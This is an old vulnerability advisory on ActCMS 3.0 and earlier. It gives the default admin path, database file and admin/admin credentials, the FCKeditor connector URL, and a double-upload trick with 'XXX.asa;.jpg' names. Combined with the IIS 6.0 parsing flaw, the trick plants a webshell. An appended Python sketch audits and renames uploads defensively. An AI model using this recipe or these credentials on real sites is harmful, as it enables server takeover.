ActCMS website management system 0day vulnerability - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201234020
Type myhack58
Reporter Anonymous
Modified 2012-06-01T00:00:00


Author: Liuker

Affected versions: ActCMS 3.0 and below

Default admin (back-end) path: admin/

Default database: App_Data/DataBase.mdb

Default account: admin

Default password: admin

Uses: the FCK editor (FCKeditor)

Vulnerable interface:

admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx

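The issue is reached by uploading through FCK twice.

A file named like XXX.asa;.jpg can be uploaded.

After the first upload it is renamed to XXX_asa;.jpg (the dot before "asa" is replaced with an underscore).

Upload XXX.asa;.jpg again.

This time it is stored as XXX.asa;(1).jpg: the dot before "asa" is kept, as the name shows.

Combined with the IIS 6.0 parsing vulnerability, this yields a webshell.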
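For defenders, the sketch below is an added example (not code from ActCMS, FCKeditor or the original advisory) showing how to audit an upload folder listing for the name patterns described above, and how to name uploads so that no rename path can bring the client-supplied name back. The allow-list, the function names and the sample listing are assumptions; Python is used only for illustration, since the affected connector is ASP.NET.

```python
import os
import secrets

# Assumed allow-list for an image uploader; adjust to the site's real needs.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def is_suspicious(name: str) -> bool:
    """Flag names that should never exist in an image upload folder."""
    base = os.path.basename(name.replace("\\", "/"))
    # The IIS 6.0 parsing flaw treats the text before ';' as the file name,
    # so any ';' in a stored name is a red flag regardless of what follows.
    if ";" in base:
        return True
    stem, ext = os.path.splitext(base)
    # The final extension must be on the allow-list.
    if ext.lower() not in ALLOWED_EXT:
        return True
    # Conservative: a dot left in the stem means a second extension.
    return "." in stem


def stored_name(client_name: str) -> str:
    """Validate the client name, then return a server-generated name.

    Only the validated extension is reused, so a duplicate-name rename
    such as "name(1).jpg" can never reintroduce the original name.
    """
    if is_suspicious(client_name):
        raise ValueError("rejected upload name: %r" % client_name)
    ext = os.path.splitext(client_name)[1].lower()
    return secrets.token_hex(16) + ext


def audit(names):
    """Return the entries of an upload folder listing that need review."""
    return [n for n in names if is_suspicious(n)]


# Constructed sample listing using the name patterns from the advisory.
SAMPLE_LISTING = ["logo.png", "XXX_asa;.jpg", "XXX.asa;(1).jpg", "photo(1).jpg"]

if __name__ == "__main__":
    for entry in audit(SAMPLE_LISTING):
        print("review:", entry)
```

The check runs on the name that will actually be written to disk, which is the step the double-upload sequence above slips past.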